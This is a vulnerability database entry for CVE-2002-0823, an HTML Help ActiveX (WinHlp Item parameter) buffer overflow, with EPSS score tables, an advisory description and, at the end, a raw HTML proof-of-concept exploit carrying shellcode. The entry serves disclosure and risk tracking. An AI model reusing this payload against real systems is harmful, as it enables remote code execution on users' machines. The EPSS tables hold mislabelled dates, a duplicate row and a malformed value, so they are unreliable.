CVE-2002-0823 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	44.63%	–	–
2023-03-12	–	–	–	91.47%	–
2023-04-23	–	–	–	89.82%	–
2023-11-12	–	–	–	62.41%	–
2024-02-11	–	–	–	18.32%	–
2024-06-02	–	–	–	18.32%	–
2025-01-19	–	–	–	18.32%	–
2025-03-18	–	–	–	–	41.19%
2025-03-30	–	–	–	–	35.66%
2025-03-30	–	–	–	–	35.66,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	98%
2023-03-12	98%
2023-04-23	98%
2023-11-12	98%
2024-02-11	96%
2024-06-02	96%
2025-01-19	96%
2025-03-18	97%
2025-03-30	97%
2025-03-30	97%

source: https://www.securityfocus.com/bid/4857/info HTML Help ActiveX control (Hhctrl.ocx) ships as part of Microsoft HTML Help and is designed to work with Internet Explorer to provide functionality for help systems. A remotely exploitable issue has been reported in the WinHlp facility. The software fails to perform sufficient boundary checks of the Item parameter in the WinHlp command. This issue resides in Winhlp32.exe. An attacker can exploit this condition by embedding a call to the vulnerable ActiveX control in a malicious webpage or HTML email. If successful, the attacker may be able to execute arbitrary code on the client system as the Internet Explorer user. Note that Windows ships with HTML Help. The HTML Help ActiveX control can also reportedly be used to mount denial-of-service attacks and exploit other stack- and heap-based overflows. Tiny Personal Firewall 3.0 reportedly treats the HTML Help facility as a trusted application in the default configuration. As a result, any outgoing/back-channel connections that stem from successful exploits will not be blocked by the firewall in the default configuration. Note that this issue is reportedly not present in Tiny Personal Firewall 2.0. <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE="^Ð^Ð^Ð^Ð^Ð^Ð^Ð^Ð3�Phcalc^Í4$&#402;�&#1;PV¸¯§éw^?Ð3�P¾&#8221;^Ïéw^?�AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH^Ð&#402;�&#21;^?ægMyWindow"><PARAM NAME="Item2" VALUE="NGS Software LTD"></OBJECT> <SCRIPT>winhelp.HHClick()</SCRIPT>